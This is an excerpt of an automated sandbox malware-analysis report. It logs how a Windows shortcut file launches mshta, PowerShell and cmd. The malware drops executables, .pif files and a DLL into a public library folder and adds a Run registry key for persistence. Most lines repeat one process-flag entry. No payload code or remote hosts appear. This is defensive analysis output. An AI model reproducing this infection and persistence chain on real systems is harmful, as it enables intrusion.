                    Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                    Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                    Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                    Drops PE files with a suspicious file extension
                    Source: C:\Users\user\AppData\Roaming\uc.exeFile created: C:\Users\Public\Libraries\bwsiuvcU.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Ucvuiswb.PIFJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\uc.exeFile created: C:\Users\Public\Libraries\bwsiuvcU.pifJump to dropped file
                    Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Ucvuiswb.PIFJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\uc.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\uc.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\uc.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\uc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UcvuiswbJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UcvuiswbJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uc.exeCode function: 19_2_02999B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_02999B94
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
